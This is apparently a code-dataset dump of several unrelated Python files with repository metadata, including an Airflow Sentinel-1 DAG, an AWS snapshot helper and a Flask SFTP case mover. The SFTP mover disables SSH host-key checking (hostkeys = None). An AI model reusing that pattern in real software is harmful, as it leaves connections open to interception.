expected_raw = f.read()
self.assertEqual(
expected_raw,
stderr_raw
)
except FileNotFoundError:
self.assertEqual(
'',
stderr_raw
)
return system_test
def add_tests(run, directory):
for test in os.listdir(directory):
# append test
setattr(
TestSystem,
'test_{}_{}'.format(run.__name__, test),
get_test(run, directory, test)
)
# Add tests
add_tests(pdml2flow.pdml2flow, TEST_DIR_PDML2FLOW)
add_tests(pdml2flow.pdml2frame, TEST_DIR_PDML2FRAME)
| 28.491667 | 71 | 0.488154 | 345 | 3,419 | 4.663768 | 0.295652 | 0.056557 | 0.059043 | 0.052206 | 0.10317 | 0.047234 | 0.047234 | 0.047234 | 0.047234 | 0 | 0 | 0.008656 | 0.425563 | 3,419 | 119 | 72 | 28.731092 | 0.810591 | 0.073706 | 0 | 0.230769 | 0 | 0 | 0.038669 | 0.013629 | 0 | 0 | 0 | 0 | 0.065934 | 1 | 0.043956 | false | 0.010989 | 0.087912 | 0 | 0.164835 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a32119c70c0d1383a924bfd29be201dc7093bcb | 3,258 | py | Python | subprojects/sno-snapshot/src/common.py | azh412/ci-artifacts | cd8d39f6fcc8f12d76afe1bbe242d59857e2b1a0 | [
"Apache-2.0"
] | null | null | null | subprojects/sno-snapshot/src/common.py | azh412/ci-artifacts | cd8d39f6fcc8f12d76afe1bbe242d59857e2b1a0 | [
"Apache-2.0"
] | null | null | null | subprojects/sno-snapshot/src/common.py | azh412/ci-artifacts | cd8d39f6fcc8f12d76afe1bbe242d59857e2b1a0 | [
"Apache-2.0"
] | null | null | null | import time, datetime
print("Importing OpenShift/Kubernetes packages ...")
import kubernetes
import ocp_resources
import openshift
from ocp_resources.node import Node
from ocp_resources.machine import Machine
from openshift.dynamic import DynamicClient
try:
client_k8s = DynamicClient(client=kubernetes.config.new_client_from_config())
except Exception:
client_k8s = None
print("WARNING: kubernetes not available.")
print("Importing AWS boto3 ...")
import boto3
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html
client_ec2 = boto3.client('ec2')
resource_ec2 = boto3.resource('ec2')
print("Ready.")
def wait_openshift():
first = True
print("Waiting for OpenShift cluster to be ready ...")
import urllib3
while True:
try:
global client_k8s
client_k8s = DynamicClient(client=kubernetes.config.new_client_from_config())
nodes = [m for m in Node.get(dyn_client=client_k8s)]
if len(nodes) != 0:
print(f"Found {len(nodes)} node, OpenShift Cluster is ready!")
break
except urllib3.exceptions.MaxRetryError: pass
except kubernetes.client.exceptions.ApiException: pass
time.sleep(10)
def get_machine_props():
if not client_k8s:
        return None, None, None
machines = [m for m in Machine.get(dyn_client=client_k8s)]
if len(machines) != 1:
raise RuntimeError("Should be only one machine ...")
machine = machines[0]
cluster_name = machine.cluster_name
print(f"Cluster name: {cluster_name}")
instance = resource_ec2.Instance(machine.instance.status.providerStatus.instanceId)
instance.load()
print(f"Instance Id: {instance.id}")
zone = machine.instance.spec.providerSpec.value.placement.availabilityZone
print(f"Availability zone: {zone}")
return cluster_name, instance, zone
def get_instance_root_volume(instance):
volumes = [v for v in instance.volumes.all()]
if len(volumes) > 1:
print("WARNING: more than 1 volume found ...")
return volumes[0]
def get_cluster_snapshot(cluster_name, instance, zone):
resp = client_ec2.describe_snapshots(
Filters=[{
'Name': f'tag:kubernetes.io/cluster/{cluster_name}',
'Values': ['owned']
}])
snapshots = resp["Snapshots"]
if len(snapshots) == 0:
return None
if len(snapshots) > 1:
print("WARNING: more than 1 snapshot found ... taking the first one.")
snapshot = resource_ec2.Snapshot(snapshots[0]['SnapshotId'])
snapshot.load()
return snapshot
def await_snapshot(snapshot):
prev = ""
if snapshot.progress == "100%":
print(f"Snapshot {snapshot.id} is ready.")
while not snapshot.progress == "100%":
if prev == "":
print(f"Awaiting for the completion of snapshot {snapshot.id} ...")
print(snapshot.progress)
prev = snapshot.progress
time.sleep(10)
snapshot.reload()
if prev != snapshot.progress:
prev = snapshot.progress
print(snapshot.progress)
def human_ts():
return datetime.datetime.now().strftime("%Y-%m-%dT%H:%M")
| 28.330435 | 89 | 0.664825 | 396 | 3,258 | 5.366162 | 0.323232 | 0.029647 | 0.022588 | 0.018824 | 0.170353 | 0.136471 | 0.115765 | 0.059294 | 0.059294 | 0.059294 | 0 | 0.016969 | 0.222222 | 3,258 | 114 | 90 | 28.578947 | 0.821626 | 0.025476 | 0 | 0.142857 | 0 | 0 | 0.189411 | 0.012606 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0.02381 | 0.142857 | 0.011905 | 0.285714 | 0.178571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a32a66412ac752dfef1346767dada6ace8dbe66 | 280 | py | Python | tests/send_update.py | ZenLighting/ZenLightSimulator | 974e2806106e534aede35b5a9efd8667c55a6a25 | [
"MIT"
] | null | null | null | tests/send_update.py | ZenLighting/ZenLightSimulator | 974e2806106e534aede35b5a9efd8667c55a6a25 | [
"MIT"
] | null | null | null | tests/send_update.py | ZenLighting/ZenLightSimulator | 974e2806106e534aede35b5a9efd8667c55a6a25 | [
"MIT"
] | null | null | null | import socket
import struct
send_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
# payload: four unsigned bytes (e.g. an RGBA-style value 0, 0, 255, 255)
data_bytes = struct.pack("!BBBB", 0, 0, 255, 255)
# header: network byte order, 1-byte type, two 4-byte ints, 2-byte length
header = struct.pack("!BIIH", 0, 0, 0, len(data_bytes))
message = header + data_bytes
send_sock.sendto(message, ("localhost", 42000)) | 23.333333 | 63 | 0.721429 | 44 | 280 | 4.431818 | 0.477273 | 0.138462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069388 | 0.125 | 280 | 12 | 64 | 23.333333 | 0.726531 | 0 | 0 | 0 | 0 | 0 | 0.067616 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a3459ee78d5b57a83665367b43a2ebae445c84e | 3,001 | py | Python | app/mover.py | uk-gov-mirror/ONSdigital.blaise-nisra-case-mover | 6bc3af5eec43ee543bcfed428779ca57f903007f | [
"MIT"
] | null | null | null | app/mover.py | uk-gov-mirror/ONSdigital.blaise-nisra-case-mover | 6bc3af5eec43ee543bcfed428779ca57f903007f | [
"MIT"
] | null | null | null | app/mover.py | uk-gov-mirror/ONSdigital.blaise-nisra-case-mover | 6bc3af5eec43ee543bcfed428779ca57f903007f | [
"MIT"
] | null | null | null | from typing import Dict
import pysftp
from flask import Blueprint, current_app
from paramiko import SSHException
from models import Instrument
from pkg.case_mover import CaseMover
from pkg.google_storage import GoogleStorage
from pkg.sftp import SFTP
from util.service_logging import log
mover = Blueprint("batch", __name__, url_prefix="/")
@mover.route("/")
def main():
config = current_app.nisra_config
sftp_config = current_app.sftp_config
google_storage = init_google_storage(config)
if google_storage.bucket is None:
return "Connection to bucket failed", 500
log.info("Connecting to SFTP server")
cnopts = pysftp.CnOpts()
cnopts.hostkeys = None
with pysftp.Connection(
host=sftp_config.host,
username=sftp_config.username,
password=sftp_config.password,
port=int(sftp_config.port),
cnopts=cnopts,
) as sftp_connection:
log.info("Connected to SFTP server")
sftp = SFTP(sftp_connection, sftp_config, config)
case_mover = CaseMover(google_storage, config, sftp)
instruments = get_filtered_instruments(sftp)
log.info(f"Processing survey - {sftp_config.survey_source_path}")
if len(instruments) == 0:
log.info("No instrument folders found")
return "No instrument folders found, exiting", 200
for instrument_name, instrument in instruments.items():
process_instrument(case_mover, instrument_name, instrument)
log.info("SFTP connection closed")
log.info("Process complete")
return "Process complete", 200
@mover.errorhandler(SSHException)
def handle_ssh_exception(exception):
log.error("SFTP connection failed - %s", exception)
return "SFTP connection failed", 500
@mover.errorhandler(Exception)
def handle_exception(exception):
log.error("Exception - %s", exception)
log.info("SFTP connection closed")
return "Exception occurred", 500
def process_instrument(
case_mover: CaseMover, instrument_name: str, instrument: Instrument
) -> None:
log.info(f"Processing instrument - {instrument_name} - {instrument.sftp_path}")
if case_mover.bdbx_md5_changed(instrument):
log.info(
f"Instrument - {instrument_name} - "
+ "has no changes to the databse file, skipping..."
)
else:
log.info(f"Syncing instrument - {instrument_name}")
case_mover.sync_instrument(instrument)
case_mover.send_request_to_api(instrument.gcp_folder())
def get_filtered_instruments(sftp: SFTP) -> Dict[str, Instrument]:
    instrument_folders = sftp.get_instrument_folders()
    instruments = sftp.get_instrument_files(instrument_folders)
instruments = sftp.filter_instrument_files(instruments)
instruments = sftp.generate_bdbx_md5s(instruments)
return instruments
def init_google_storage(config):
google_storage = GoogleStorage(config.bucket_name, log)
google_storage.initialise_bucket_connection()
return google_storage
| 31.925532 | 83 | 0.71876 | 358 | 3,001 | 5.818436 | 0.304469 | 0.033605 | 0.015362 | 0.022084 | 0.025924 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00742 | 0.191603 | 3,001 | 93 | 84 | 32.268817 | 0.851195 | 0 | 0 | 0.027778 | 0 | 0 | 0.179607 | 0.017994 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0.013889 | 0.125 | 0 | 0.305556 | 0.027778 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a35308e3e1033d1025ac934d26add8ef584b069 | 3,156 | py | Python | pytjson/_tjson/datatype.py | anupsv/tjson | 672dcb6a5161260620df880f2828ae3c445fc6b8 | [
"MIT"
] | null | null | null | pytjson/_tjson/datatype.py | anupsv/tjson | 672dcb6a5161260620df880f2828ae3c445fc6b8 | [
"MIT"
] | 3 | 2017-11-17T12:38:57.000Z | 2021-11-15T17:46:44.000Z | pytjson/_tjson/datatype.py | anupsv/pytjson | 672dcb6a5161260620df880f2828ae3c445fc6b8 | [
"MIT"
] | 1 | 2016-11-15T08:19:17.000Z | 2016-11-15T08:19:17.000Z | import re, datetime
from Helpers.freezable_list import FrozenDict
from pytjson.Exceptions import ParseError
class Datatype:
# Initializer, will be overriden below
TAGS = {}
isScalar = re.compile(r'^[a-z0-9]*$')
isBin = re.compile('^[01]{8}$')
isOnlyNumbers = re.compile('^\-?(0|[1-9][0-9]*)$')
isNonScalar = re.compile(r'^([A-Z][a-z0-9]*)\<(.*)\>$')
@staticmethod
def parse(tag):
if not isinstance(tag, (str, unicode)):
raise TypeError("expected String, got {}".format(type(tag)))
if tag == "O":
# Object
return Datatype.TAGS[tag]
elif Datatype.isNonScalar.match(tag):
tmp_inner = Datatype.isNonScalar.match(tag).group(2)
tmp_type = Datatype.isNonScalar.match(tag).group(1)
inner = Datatype.parse(tmp_inner)
if tmp_type == "A":
tmp = Array(inner)
else:
tmp = Datatype.TAGS[tmp_type]
return tmp
elif Datatype.isScalar.match(tag):
# Scalar
return Datatype.TAGS[tag]
else:
raise ParseError("couldn't parse tag: {}".format(repr(tag)))
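    # Illustrative sketch (assuming the TAGS mapping at the bottom of this
    # module): Datatype.parse("s") returns the String scalar, while
    # Datatype.parse("A<i>") returns an Array wrapping the SignedInt scalar.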
@staticmethod
def identify_type(obj, is_bytes):
if type(obj) is dict:
return Datatype.TAGS["O"]
elif type(obj) is list:
t = Array(None)
return t._identify_type(obj)
        elif isinstance(obj, str):
return Datatype.TAGS["s"]
elif type(obj) is int:
return Datatype.TAGS["i"]
elif type(obj) is float:
return Datatype.TAGS["f"]
elif isinstance(obj, datetime.datetime):
return Datatype.TAGS["t"]
elif is_bytes:
return Datatype.TAGS["b"]
else:
raise TypeError("don't know how to serialize #{obj.class} as TJSON")
def datatype_generate(self, obj):
        is_bytes = isinstance(obj, bytes)
return self.identify_type(obj, is_bytes).generate(obj)
class Scalar(Datatype):
@staticmethod
def isScalar():
return True
class NonScalar(Datatype):
def __init__(self, inner_type):
self.inner_type = inner_type
@staticmethod
def isScalar():
return False
class Number(Scalar):
pass
class Integer:
@staticmethod
def generate(int_data):
# Integers are serialized as strings to sidestep the limits of some JSON parsers
return str(int_data).encode("utf-8")
class Binary(Scalar):
pass
from datatypes.string import String
from datatypes.timestamp import Timestamp
from datatypes.float import Float
from datatypes.integer import SignedInt, UnsignedInt
from datatypes.array import Array
from datatypes.binary import Binary16, Binary32, Binary64
from datatypes.object import Object
class Datatype(Datatype):
Datatype.TAGS = FrozenDict(
O = Object(None),
b = Binary64(),
b16 = Binary16(),
b32 = Binary32(),
b64 = Binary64(),
f = Float(),
i = SignedInt(),
s = String(),
t = Timestamp(),
u = UnsignedInt()
)
| 26.745763 | 88 | 0.596641 | 372 | 3,156 | 4.997312 | 0.317204 | 0.064551 | 0.077461 | 0.043572 | 0.058096 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015604 | 0.28929 | 3,156 | 117 | 89 | 26.974359 | 0.813197 | 0.040875 | 0 | 0.159091 | 0 | 0 | 0.057247 | 0.008604 | 0 | 0 | 0 | 0 | 0 | 1 | 0.079545 | false | 0.022727 | 0.113636 | 0.034091 | 0.488636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a3613dff1cdfc6a420222a030f7083c34976694 | 864 | py | Python | Code Challenges/python/checkPalindrome_codesignal.py | lineality/Coding-Challenges-Study-Practice | 76d868b11b42b3bd3634f9a62abecb2e1eaac76d | [
"MIT"
] | null | null | null | Code Challenges/python/checkPalindrome_codesignal.py | lineality/Coding-Challenges-Study-Practice | 76d868b11b42b3bd3634f9a62abecb2e1eaac76d | [
"MIT"
] | 1 | 2021-06-24T17:39:48.000Z | 2021-06-24T17:39:48.000Z | Code Challenges/python/checkPalindrome_codesignal.py | lineality/Coding-Study | 76d868b11b42b3bd3634f9a62abecb2e1eaac76d | [
"MIT"
] | null | null | null | # not working, not sure why (as parts work separately
# outside of function)
# (User's) Problem
# We have:
# a string
# We need:
# is that string a palindrome? yes/no
# We must:
# boolean output
# name of function is
# checkPalindrome
# Solution (Product)
# Strategy 1:
# turn string into a list(array)
# Make a compare_list which is the reverse order of
# the original list
# compare the two, if they are the same: true, else false
def checkPalindrome(inputString):
# make input a list
input_as_list = list(inputString)
    # make a reverse list
    # (first make a real copy; plain assignment would only alias the list)
    reverse_order = list(input_as_list)
# (this function has no input or output, it reverses in place)
reverse_order.reverse()
# compare two lists
if input_as_list == reverse_order:
return True
else:
return False
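# Illustrative checks (not part of the original exercise):
# checkPalindrome("aabaa") -> True
# checkPalindrome("abac")  -> False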
| 24 | 66 | 0.664352 | 124 | 864 | 4.548387 | 0.532258 | 0.085106 | 0.058511 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001577 | 0.266204 | 864 | 35 | 67 | 24.685714 | 0.888013 | 0.659722 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a37bfae9bd13611e15a98b21e3b6c87ccdce595 | 13,296 | py | Python | airflow/dags/sentinel1/S1_GRD_1SDV.py | geosolutions-it/evo-odas | 983912614317c28ba88fe078f5069266dd8469bb | [
"MIT"
] | 29 | 2018-01-03T18:41:03.000Z | 2022-02-03T01:15:46.000Z | airflow/dags/sentinel1/S1_GRD_1SDV.py | geosolutions-it/evo-odas | 983912614317c28ba88fe078f5069266dd8469bb | [
"MIT"
] | 226 | 2016-10-05T10:01:12.000Z | 2021-07-20T18:47:59.000Z | airflow/dags/sentinel1/S1_GRD_1SDV.py | geosolutions-it/evo-odas | 983912614317c28ba88fe078f5069266dd8469bb | [
"MIT"
] | 13 | 2016-10-13T14:55:33.000Z | 2022-02-03T01:15:33.000Z | """
/*********************************************************************************/
* The MIT License (MIT) *
* *
* Copyright (c) 2014 EOX IT Services GmbH *
* *
* Permission is hereby granted, free of charge, to any person obtaining a copy *
* of this software and associated documentation files (the "Software"), to deal *
* in the Software without restriction, including without limitation the rights *
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell *
* copies of the Software, and to permit persons to whom the Software is *
* furnished to do so, subject to the following conditions: *
* *
* The above copyright notice and this permission notice shall be included in *
* all copies or substantial portions of the Software. *
* *
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR *
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, *
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE *
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER *
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, *
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE *
* SOFTWARE. *
* *
*********************************************************************************/
"""
import os
import logging
import pprint
from datetime import datetime, timedelta
from airflow import DAG
from airflow.models import XCOM_RETURN_KEY
from airflow.operators import PythonOperator
from airflow.operators import RSYNCOperator
from airflow.operators import DHUSSearchOperator
from airflow.operators import DHUSDownloadOperator
from airflow.operators import ZipInspector
from airflow.operators import S1MetadataOperator
from airflow.operators import GDALWarpOperator
from airflow.operators import GDALAddoOperator
from airflow.utils.trigger_rule import TriggerRule
from geoserver_plugin import publish_product
import config as CFG
import config.s1_grd_1sdv as S1GRD1SDV
log = logging.getLogger(__name__)
# Settings
default_args = {
##################################################
# General configuration
#
'start_date': datetime.now() - timedelta(hours=1),
'owner': 'airflow',
'depends_on_past': False,
'provide_context': True,
'email': ['airflow@evoodas.dlr.de'],
'email_on_failure': False,
'email_on_retry': False,
'retries': 1,
'max_threads': 1,
'max_active_runs': 1,
# 'queue': 'bash_queue',
# 'pool': 'backfill',
# 'priority_weight': 10,
# 'end_date': datetime(2016, 1, 1),
#
}
print("#######################")
print("Interval: ".format(S1GRD1SDV.dag_schedule_interval))
print("ID: {}".format(S1GRD1SDV.id))
print("DHUS: {} @ {}, Region: {}".format(CFG.dhus_username, CFG.dhus_url, S1GRD1SDV.dhus_search_bbox) )
print("GeoServer: {} @ {}".format(CFG.geoserver_username, CFG.geoserver_rest_url) )
print("RSYNC: {} @ {} using {}".format(CFG.rsync_username, CFG.rsync_hostname, CFG.rsync_ssh_key))
print("Date: {} / {}".format(S1GRD1SDV.dhus_search_startdate, S1GRD1SDV.dhus_search_enddate))
print("Search: max={}, order_by={}, keywords={}".format(S1GRD1SDV.dhus_filter_max, S1GRD1SDV.dhus_search_orderby,S1GRD1SDV.dhus_search_keywords))
print("Paths:\n collection_dir={}\n download_dir={}\n process_dir={}\n original_package_upload_dir={}\n repository_dir={}".format(S1GRD1SDV.collection_dir, S1GRD1SDV.download_dir, S1GRD1SDV.process_dir, S1GRD1SDV.original_package_upload_dir, S1GRD1SDV.repository_dir))
print("Collection:\n workspace={}\n layer={}".format(S1GRD1SDV.geoserver_workspace, S1GRD1SDV.geoserver_layer))
print("#######################")
TARGET_SRS = 'EPSG:4326'
TILE_SIZE = 512
OVERWRITE = True
RESAMPLING_METHOD = 'average'
MAX_OVERVIEW_LEVEL = 512
def prepare_band_paths(get_inputs_from, *args, **kwargs):
"""Get Product / Band files path Dictionary from ZipInspector and extract the list of band files """
task_instance = kwargs['ti']
# band number from task name
task_id = task_instance.task_id
band_number = int(task_id.split('_')[-1])
log.info("Getting inputs from: " + get_inputs_from)
product_bands_dict = task_instance.xcom_pull(task_ids=get_inputs_from, key=XCOM_RETURN_KEY)
if product_bands_dict is None:
log.info("No input from ZipInspector. Nothing to do")
return None
log.info("Product Band Dictionary: {}".format(pprint.pformat(product_bands_dict)))
files_path=[]
for k in product_bands_dict:
files_path += product_bands_dict[k]
# Push one of the band paths to XCom
file_path = files_path[band_number - 1]
return [file_path]
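# Illustrative sketch (task ids match the loop below): a task named
# "get_band_paths_2" yields band_number 2 and therefore returns the
# second band file extracted by the ZipInspector.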
# DAG definition
dag = DAG(S1GRD1SDV.id,
description='DAG for searching, filtering and downloading Sentinel 1 data from DHUS server',
schedule_interval=S1GRD1SDV.dag_schedule_interval,
catchup=False,
default_args=default_args
)
# DHUS Search Task Operator
search_task = DHUSSearchOperator(task_id='search_product_task',
dhus_url=CFG.dhus_url,
dhus_user=CFG.dhus_username,
dhus_pass=CFG.dhus_password,
geojson_bbox=S1GRD1SDV.dhus_search_bbox,
startdate=S1GRD1SDV.dhus_search_startdate,
enddate=S1GRD1SDV.dhus_search_enddate,
filter_max=S1GRD1SDV.dhus_filter_max,
order_by=S1GRD1SDV.dhus_search_orderby,
keywords=S1GRD1SDV.dhus_search_keywords,
dag=dag)
# DHUS Download Task Operator
download_task = DHUSDownloadOperator(task_id='download_product_task',
dhus_url=CFG.dhus_url,
dhus_user=CFG.dhus_username,
dhus_pass=CFG.dhus_password,
download_max=S1GRD1SDV.dhus_download_max,
download_dir=S1GRD1SDV.download_dir,
get_inputs_from=search_task.task_id,
download_timeout=timedelta(hours=12),
dag=dag)
# Rsync Archive Task for Products
archive_task = RSYNCOperator(task_id="upload_original_package",
host = CFG.rsync_hostname,
remote_usr = CFG.rsync_username,
ssh_key_file = CFG.rsync_ssh_key,
remote_dir = S1GRD1SDV.original_package_upload_dir,
get_inputs_from=download_task.task_id,
dag=dag)
# Zip Inspector and Extractor Task
zip_task = ZipInspector(task_id='zip_inspector',
extension_to_search='tiff',
get_inputs_from=download_task.task_id,
dag=dag)
warp_tasks = []
addo_tasks = []
upload_tasks = []
band_paths_tasks = []
for i in range(1, 3):
band_paths = PythonOperator(task_id="get_band_paths_" + str(i),
python_callable=prepare_band_paths,
op_kwargs={
'get_inputs_from': zip_task.task_id
},
dag=dag)
band_paths_tasks.append(band_paths)
warp = GDALWarpOperator(
task_id='gdalwarp_' + str(i),
target_srs=TARGET_SRS,
tile_size=TILE_SIZE,
overwrite=OVERWRITE,
dstdir=S1GRD1SDV.process_dir,
get_inputs_from=band_paths.task_id,
dag=dag
)
warp_tasks.append(warp)
addo = GDALAddoOperator(
trigger_rule=TriggerRule.ALL_SUCCESS,
resampling_method=RESAMPLING_METHOD,
max_overview_level=MAX_OVERVIEW_LEVEL,
task_id='gdal_addo_' + str(i),
get_inputs_from=warp.task_id,
dag=dag
)
addo_tasks.append(addo)
upload = RSYNCOperator(task_id="upload_granule_{}_task".format(str(i)),
host=CFG.rsync_hostname,
remote_usr=CFG.rsync_username,
ssh_key_file=CFG.rsync_ssh_key,
remote_dir=S1GRD1SDV.repository_dir,
get_inputs_from=addo.task_id,
dag=dag)
upload_tasks.append(upload)
band_paths.set_upstream(zip_task)
warp.set_upstream(band_paths)
addo.set_upstream(warp)
upload.set_upstream(addo)
# Metadata Extraction task
addo_task_ids = ( task.task_id for task in addo_tasks )
upload_task_ids = ( task.task_id for task in upload_tasks )
metadata_task = S1MetadataOperator(task_id="extract_metadata_task",
product_safe_path=None,
granules_paths=None,
granules_upload_dir=S1GRD1SDV.repository_dir,
processing_dir=S1GRD1SDV.process_dir,
original_package_download_base_url=S1GRD1SDV.original_package_download_base_url,
gs_workspace=S1GRD1SDV.geoserver_workspace,
bands_dict = S1GRD1SDV.bands_dict,
gs_wms_layer=S1GRD1SDV.geoserver_layer,
gs_wfs_featuretype=S1GRD1SDV.geoserver_featuretype,
gs_wfs_format=S1GRD1SDV.geoserver_oseo_wfs_format,
gs_wfs_version=S1GRD1SDV.geoserver_oseo_wfs_version,
gs_wms_width=S1GRD1SDV.geoserver_oseo_wms_width,
gs_wms_height=S1GRD1SDV.geoserver_oseo_wms_height,
gs_wms_format=S1GRD1SDV.geoserver_oseo_wms_format,
gs_wms_version=S1GRD1SDV.geoserver_oseo_wms_version,
gs_wcs_coverage_id=S1GRD1SDV.geoserver_coverage,
gs_wcs_scale_i=S1GRD1SDV.geoserver_oseo_wcs_scale_i,
gs_wcs_scale_j=S1GRD1SDV.geoserver_oseo_wcs_scale_j,
gs_wcs_format=S1GRD1SDV.geoserver_oseo_wcs_format,
gs_wcs_version=S1GRD1SDV.geoserver_oseo_wcs_version,
get_inputs_from = {
'download_task_id': download_task.task_id,
'addo_task_ids': addo_task_ids,
'upload_task_ids': upload_task_ids,
'archive_product_task_id' : archive_task.task_id,
},
dag=dag)
# Publish product.zip to GeoServer
publish_task = PythonOperator(task_id="publish_product_task",
python_callable=publish_product,
op_kwargs={
'geoserver_username': CFG.geoserver_username,
'geoserver_password': CFG.geoserver_password,
'geoserver_rest_endpoint': '{}/oseo/collections/{}/products'.format(CFG.geoserver_rest_url, S1GRD1SDV.geoserver_oseo_collection), 'get_inputs_from': metadata_task.task_id,
},
dag = dag)
if CFG.eoxserver_rest_url:
publish_eox_task = PythonOperator(task_id="publish_product_eox_task",
python_callable=publish_product,
op_kwargs={
'geoserver_username': CFG.eoxserver_username,
'geoserver_password': CFG.eoxserver_password,
'geoserver_rest_endpoint': CFG.eoxserver_rest_url,
'get_inputs_from': metadata_task.task_id,
},
dag = dag)
download_task.set_upstream(search_task)
archive_task.set_upstream(download_task)
zip_task.set_upstream(download_task)
metadata_task.set_upstream(download_task)
metadata_task.set_upstream(archive_task)
for task in upload_tasks:
metadata_task.set_upstream(task)
publish_task.set_upstream(metadata_task)
if CFG.eoxserver_rest_url:
publish_eox_task.set_upstream(metadata_task)
| 47.655914 | 273 | 0.571224 | 1,357 | 13,296 | 5.27045 | 0.23434 | 0.024329 | 0.02363 | 0.015101 | 0.196309 | 0.141779 | 0.119128 | 0.111437 | 0.094379 | 0.061801 | 0 | 0.015117 | 0.338297 | 13,296 | 278 | 274 | 47.827338 | 0.797795 | 0.187801 | 0 | 0.17 | 0 | 0 | 0.105317 | 0.029011 | 0 | 0 | 0 | 0 | 0 | 1 | 0.005 | false | 0.02 | 0.09 | 0 | 0.105 | 0.065 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a37c7ba2d228caef670de2aefc502f114329be0 | 579 | py | Python | cfn_model/model/EC2NetworkInterface.py | jaymecd/cloudformation-validator | 4f6951a002f338010b63fa3fbd23ddd8022558fa | [
"MIT"
] | 6 | 2018-08-07T01:58:16.000Z | 2020-09-10T14:40:35.000Z | cfn_model/model/EC2NetworkInterface.py | jaymecd/cloudformation-validator | 4f6951a002f338010b63fa3fbd23ddd8022558fa | [
"MIT"
] | 1 | 2018-10-16T20:40:27.000Z | 2018-10-17T02:18:05.000Z | cfn_model/model/EC2NetworkInterface.py | jaymecd/cloudformation-validator | 4f6951a002f338010b63fa3fbd23ddd8022558fa | [
"MIT"
] | 1 | 2019-01-17T21:35:47.000Z | 2019-01-17T21:35:47.000Z | from __future__ import absolute_import, division, print_function
from cfn_model.model.ModelElement import ModelElement
class EC2NetworkInterface(ModelElement):
"""
    EC2 network interface model element
"""
def __init__(self, cfn_model):
"""
Initialize
:param cfn_model:
"""
ModelElement.__init__(self, cfn_model)
        self.groupSet = []
        self.ipv6Addresses = []
        self.privateIpAddresses = []
        self.tags = []
        self.security_groups = []
        self.resource_type = 'AWS::EC2::NetworkInterface'
| 23.16 | 64 | 0.637306 | 54 | 579 | 6.462963 | 0.574074 | 0.091691 | 0.063037 | 0.091691 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00939 | 0.264249 | 579 | 24 | 65 | 24.125 | 0.809859 | 0.108808 | 0 | 0 | 0 | 0 | 0.055914 | 0.055914 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.181818 | 0 | 0.363636 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
